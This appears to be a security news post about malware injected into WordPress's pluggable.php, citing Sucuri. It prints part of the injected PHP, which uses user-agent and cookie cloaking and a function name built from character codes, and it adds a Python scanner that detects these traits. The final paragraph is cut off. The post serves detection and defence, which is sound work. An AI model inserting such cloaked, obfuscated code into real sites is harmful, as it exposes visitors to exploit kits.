Malware Targeting WordPress Pluggable.php


One of WordPress' core files, /wp-includes/pluggable.php, is being used as the host for a malware payload, according to the security company Sucuri LLC. This is not a vulnerability in WordPress' own code: the following malicious code is being inserted into an existing pluggable.php.

$__name = "RANDOMMD5";
// Payload is only served to visitors whose user agent does not look like a developer browser,
// a crawler or a command-line fetcher, and who have not already received the marker cookie.
if(1>0 AND !preg_match("#(Firefox.3)|(opera)|(chrome)|..(wget)|(yahoo)|(yandex)#i", $_SERVER["HTTP_USER_AGENT"]) AND empty($_COOKIE[$__name])) {
// Set a 30-day cookie so the same visitor is not served the payload again.
$date = date("D, j M Y 00:00:00", time()+60*60*24*30);
$cookie = time().".".rand(1111111, 9999999);
echo "<script type=\"text/javascript\">document.cookie = \"".$__name."=\"+escape('".$cookie."')+\"; expires=".$date."; path=/\";";
// Assemble the function name "base64_decode" from character codes so the literal never appears in the file.
$__f = implode("", array_map("chr", explode(" ", "98 97 115 101 54 52 95 100 101 99 111 100 101")));
echo $__f("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmluc..

Once the malicious code is inserted, it attempts to load additional exploit code from a remote site ending with TLD, and from there the Blackhole Exploit Kit is used to further exploit the visitor.

It is unclear at this point how the code is inserted.

To make sure your WordPress site has not been infected with this malicious code, check your /wp-includes/pluggable.php file at around line 810. You can also use Sucuri's SiteCheck scanner to help find this and other malicious code.
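As an added example (not code from this post or from Sucuri), a small Python checker that looks for the two traits of this payload described above: a function name assembled from character codes via implode/array_map/chr (which decodes to base64_decode), and a user-agent filter combined with a cookie check in front of the payload. The sample input is a constructed fragment imitating the injection, not a real pluggable.php; the hexadecimal cookie name in it is made up.

```python
import re

# Constructed sample imitating the injected block; not taken from a real infected file.
SAMPLE = r'''<?php
function wp_mail() { /* legitimate core code would be here */ }
$__name = "0f1e2d3c4b5a69788796a5b4c3d2e1f0";
if(1>0 AND !preg_match("#(Firefox.3)|(opera)|(chrome)|(wget)|(yahoo)|(yandex)#i", $_SERVER["HTTP_USER_AGENT"]) AND empty($_COOKIE[$__name])) {
$__f = implode("", array_map("chr", explode(" ", "98 97 115 101 54 52 95 100 101 99 111 100 101")));
echo $__f("PHNjcmlwdA==");
}
'''

# implode("", array_map("chr", explode(" ", "<digits>"))) builds a string from char codes.
CHR_OBF = re.compile(
    r'implode\(\s*""\s*,\s*array_map\(\s*"chr"\s*,\s*explode\(\s*" "\s*,\s*"([\d ]+)"\s*\)\s*\)\s*\)'
)
# preg_match("#...#i", $_SERVER["HTTP_USER_AGENT"]) is the user-agent gate.
UA_FILTER = re.compile(r'preg_match\(\s*"#.*?#i"\s*,\s*\$_SERVER\["HTTP_USER_AGENT"\]')


def decode_chr_strings(src):
    """Return every string the file builds from space-separated char codes."""
    return ["".join(chr(int(n)) for n in m.split()) for m in CHR_OBF.findall(src)]


def scan(src):
    """Return (line number, description) findings for the traits of this payload."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for m in CHR_OBF.finditer(line):
            name = "".join(chr(int(n)) for n in m.group(1).split())
            findings.append((lineno, f"chr-obfuscated string decodes to {name!r}"))
        if UA_FILTER.search(line) and "$_COOKIE[" in line:
            findings.append((lineno, "user-agent filter plus cookie check gating a payload"))
    return findings


def scan_file(path):
    """Convenience wrapper: scan a file such as wp-includes/pluggable.php on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan(fh.read())


if __name__ == "__main__":
    for lineno, desc in scan(SAMPLE):
        print(f"line {lineno}: {desc}")
```

Run scan_file on a copy of the live file; a clean core file produces no findings, and any hit should be compared against a fresh copy of the same WordPress version.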

And be sure to read Sucuri's post on how the malicious code works.

See Also:

Website Malware Removal – Blackhole Exploit

Understanding Conditional Malware – IP Centric Variation

The last few days we have seen a large number of WordPress sites compromised with a hidden malware payload that lands inside wp-includes/pluggable.php. This is